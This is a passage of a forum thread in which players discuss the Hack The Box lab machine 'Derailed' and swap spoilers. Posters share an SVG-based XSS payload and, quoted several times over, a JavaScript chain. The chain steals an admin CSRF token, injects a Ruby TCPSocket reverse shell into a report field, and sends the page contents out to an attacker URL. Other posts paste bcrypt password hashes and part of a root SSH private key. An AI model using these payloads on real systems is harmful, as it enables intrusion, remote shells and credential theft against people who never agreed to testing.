Return to forum
Derailed - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 44
Threads: 0
Joined: N/A
Reputation: 0

#81
November 25, 2022 at 10:34 AM
[quote="gaoxiaodiao" pid="853343" dateline="1669356604"][quote="onl1_f4ns" pid="852566" dateline="1669333450"]Anybody got working xss? I want to play with intended part now. Don't see a call-back yetTried this :[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaW[/code][hr]OK. This simple payload works in clipnotes:[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%3Csvg%3E%3Canimate%20onend=alert(document.domain)%20attributeName=x%20dur=1s%3Eaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[/code]thinking how to point this back to attacker machine.. nothing yet[/quote][code]function getMiddleText(content,leftStr,rightStr){ var startIndex = content.indexOf(leftStr)+leftStr.length; var endIndex = content.indexOf(rightStr); return content.substr(startIndex,endIndex-startIndex);}fetch(`http://derailed.htb:3000/administration`).then((rep)=>{return rep.text()}).then((content)=>{ let token = getMiddleText(content,`authenticity_token" value="`,`" autocomplete=`); fetch("http://derailed.htb:3000/administration/reports", { "headers": { "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "content-type": "application/x-www-form-urlencoded", }, "referrer": "http://derailed.htb:3000/administration", "referrerPolicy": "strict-origin-when-cross-origin", "body": `authenticity_token=${token}&report_log=|ruby+-rsocket+-e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("",4444))'`, "method": "POST", "mode": "cors", }).then((rep=>{ return rep.text(); })).then((text)=>{ fetch("http:///data/"+btoa(text)); });})[/code]save the long script as clipnotes, username can create like below:[code]uOwn3LyfqH284ap_StS0bIcqAl3v7qMM0SZAxiwBrP9oHDBS[/code]then, you can get the shell.[/quote]Thanks bro. This part was missing as for intended stuff..I need to read some advanced stuff on Javascript and hackery with JS for real geeks.
Reply
Member
Member
Posts: 28
Threads: 0
Joined: N/A
Reputation: 1

#82
November 26, 2022 at 2:48 AM
(November 25, 2022, 09:12 AM)j3i_hero Wrote: could anyone send alice and toby hashes in 
var/www/rails-app/db/development.sqlite3


Alice $2a$12$hkqXQw6n0CxwBxEW/0obHOb.0/Grwie/4z95W3BhoFqpQRKIAxI7.

Toby $2a$12$AD54WZ4XBxPbNW/5gWUIKu0Hpv9UKN5RML3sDLuIqNqqimqnZYyle
Reply
Member
Member
Posts: 20
Threads: 0
Joined: N/A
Reputation: 0

#83
November 26, 2022 at 6:26 AM
[quote="gaoxiaodiao" pid="853343" dateline="1669356604"][quote="onl1_f4ns" pid="852566" dateline="1669333450"]Anybody got working xss? I want to play with intended part now. Don't see a call-back yetTried this :[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaW[/code][hr]OK. This simple payload works in clipnotes:[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%3Csvg%3E%3Canimate%20onend=alert(document.domain)%20attributeName=x%20dur=1s%3Eaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[/code]thinking how to point this back to attacker machine.. nothing yet[/quote][code]function getMiddleText(content,leftStr,rightStr){ var startIndex = content.indexOf(leftStr)+leftStr.length; var endIndex = content.indexOf(rightStr); return content.substr(startIndex,endIndex-startIndex);}fetch(`http://derailed.htb:3000/administration`).then((rep)=>{return rep.text()}).then((content)=>{ let token = getMiddleText(content,`authenticity_token" value="`,`" autocomplete=`); fetch("http://derailed.htb:3000/administration/reports", { "headers": { "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "content-type": "application/x-www-form-urlencoded", }, "referrer": "http://derailed.htb:3000/administration", "referrerPolicy": "strict-origin-when-cross-origin", "body": `authenticity_token=${token}&report_log=|ruby+-rsocket+-e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("",4444))'`, "method": "POST", "mode": "cors", }).then((rep=>{ return rep.text(); })).then((text)=>{ fetch("http:///data/"+btoa(text)); });})[/code]save the long script as clipnotes, username can create like below:[code]uOwn3LyfqH284ap_StS0bIcqAl3v7qMM0SZAxiwBrP9oHDBS[/code]then, you can get the shell.[/quote]Thx man, finally back on the host and and access persisted with own ssh key.
Reply
Member
Member
Posts: 39
Threads: 0
Joined: N/A
Reputation: 0

#84
November 26, 2022 at 7:28 AM
[quote="s0jnik" pid="857565" dateline="1669443994"][quote="gaoxiaodiao" pid="853343" dateline="1669356604"][quote="onl1_f4ns" pid="852566" dateline="1669333450"]Anybody got working xss? I want to play with intended part now. Don't see a call-back yetTried this :[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaW[/code][hr]OK. This simple payload works in clipnotes:[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%3Csvg%3E%3Canimate%20onend=alert(document.domain)%20attributeName=x%20dur=1s%3Eaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[/code]thinking how to point this back to attacker machine.. nothing yet[/quote][code]function getMiddleText(content,leftStr,rightStr){ var startIndex = content.indexOf(leftStr)+leftStr.length; var endIndex = content.indexOf(rightStr); return content.substr(startIndex,endIndex-startIndex);}fetch(`http://derailed.htb:3000/administration`).then((rep)=>{return rep.text()}).then((content)=>{ let token = getMiddleText(content,`authenticity_token" value="`,`" autocomplete=`); fetch("http://derailed.htb:3000/administration/reports", { "headers": { "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "content-type": "application/x-www-form-urlencoded", }, "referrer": "http://derailed.htb:3000/administration", "referrerPolicy": "strict-origin-when-cross-origin", "body": `authenticity_token=${token}&report_log=|ruby+-rsocket+-e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("",4444))'`, "method": "POST", "mode": "cors", }).then((rep=>{ return rep.text(); })).then((text)=>{ fetch("http:///data/"+btoa(text)); });})[/code]save the long script as clipnotes, username can create like below:[code]uOwn3LyfqH284ap_StS0bIcqAl3v7qMM0SZAxiwBrP9oHDBS[/code]then, you can get the shell.[/quote]Thx man, finally back on the host and and access persisted with own ssh key.[/quote]can you send root id_rsa plz
Reply
Advanced User
Advanced
Posts: 73
Threads: 0
Joined: N/A
Reputation: 11

#85
November 26, 2022 at 10:19 AM
(November 26, 2022, 07:28 AM)loosie Wrote: can you send root id_rsa plz


🙄  hummmm lol.
Reply
malware dev
MVP
Posts: 59
Threads: 0
Joined: N/A
Reputation: 8

Hacker
#86
November 26, 2022 at 12:06 PM
author of this box is a great hacker himself and he learnt a lesson to stop publishing id_rsa keys for accounts.
at least for insane and hard levels. you have to work your way through, thankfully...
Reply
Member
Member
Posts: 20
Threads: 0
Joined: N/A
Reputation: 0

#87
November 26, 2022 at 4:16 PM
[quote="loosie" pid="857762" dateline="1669447696"][quote="s0jnik" pid="857565" dateline="1669443994"][quote="gaoxiaodiao" pid="853343" dateline="1669356604"][quote="onl1_f4ns" pid="852566" dateline="1669333450"]Anybody got working xss? I want to play with intended part now. Don't see a call-back yetTried this :[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaW[/code][hr]OK. This simple payload works in clipnotes:[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%3Csvg%3E%3Canimate%20onend=alert(document.domain)%20attributeName=x%20dur=1s%3Eaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[/code]thinking how to point this back to attacker machine.. nothing yet[/quote][code]function getMiddleText(content,leftStr,rightStr){ var startIndex = content.indexOf(leftStr)+leftStr.length; var endIndex = content.indexOf(rightStr); return content.substr(startIndex,endIndex-startIndex);}fetch(`http://derailed.htb:3000/administration`).then((rep)=>{return rep.text()}).then((content)=>{ let token = getMiddleText(content,`authenticity_token" value="`,`" autocomplete=`); fetch("http://derailed.htb:3000/administration/reports", { "headers": { "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "content-type": "application/x-www-form-urlencoded", }, "referrer": "http://derailed.htb:3000/administration", "referrerPolicy": "strict-origin-when-cross-origin", "body": `authenticity_token=${token}&report_log=|ruby+-rsocket+-e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("",4444))'`, "method": "POST", "mode": "cors", }).then((rep=>{ return rep.text(); })).then((text)=>{ fetch("http:///data/"+btoa(text)); });})[/code]save the long script as clipnotes, username can create like below:[code]uOwn3LyfqH284ap_StS0bIcqAl3v7qMM0SZAxiwBrP9oHDBS[/code]then, you can get the shell.[/quote]Thx man, finally back on the host and and access persisted with own ssh key.[/quote]can you send root id_rsa plz[/quote]The root id_rsa is one that i deployed by myself. Thats part of this box PE that you exploit a software on the box that allows to take a ssh key from the attacker for root. So even if i send you the id_rsa from my box it will not help you with your instance. But everything needed to root is written here...
Reply
Advanced User
Advanced
Posts: 73
Threads: 0
Joined: N/A
Reputation: 11

#88
November 27, 2022 at 1:11 AM
[quote="undeadly" pid="858543" dateline="1669464382"]author of this box is a great hacker himself and he learnt a lesson to stop publishing id_rsa keys for accounts.at least for insane and hard levels. you have to work your way through, thankfully...[/quote]Yes and No.Yes after applied multiple patches then the root's private key has been removed.No from the beginning, we could retrieved the root's private key:[quote]┌──(user㉿kali)-[~/.msf4/loot]└─$ cat 20221120220230_default_127.0.0.1_chrome.debugger._239600.txt
-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcnNhAAAAAwEAAQAAAgEAmjRgHVVrgXbautwf8XHRpVYn8EVLYYZLx6AtCtYh3Gp2dba8/eOB5Plf/dIju5h2yNSOLe1EMjrRJoF/nnWraqEx3m9MMDEDNnIkmPrt0AL1NVipHOCSBmBuFozdCuQ4ug+ATwme+GVE4jnoXBBBn/ZvmHk5nc0lsG2wUbRSF9JTX7ogqJxYlhD6cgSiMwxTiKKCKGpzn60IhYtLjm7SoFFtqAnr1tONnO+IskNhifV4LZFW2lE9XX+4uC/9zJhGEIxzEufs1mD0KUBRlUcrP8+e0KWSl3eOs+HcZ3pTA0E4+/C9axK6Cm7sKijXkpCqif/Es6A04nPTg2xQdBnPvW9XvocfwA1Z52/vHeXJGc/EqknnFy5PV8vxY1ClC3pRKIWRNm9w35VoF2pkfOsphhdGU1wa2/AAAAE3Jvb3RAb3Blbm1lZGlhdmF1bHQBAgMEBQYH-----END OPENSSH PRIVATE KEY-----
[/quote]
Reply
Member
Member
Posts: 45
Threads: 0
Joined: N/A
Reputation: 0

#89
November 27, 2022 at 1:58 AM
woa nice bro thanks
Reply
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#90
November 27, 2022 at 9:13 AM
stuck in XSS, i get call back but not the token to access /administration.
Reply


 Users viewing this thread: Derailed - HTB [Discussion]: No users currently viewing.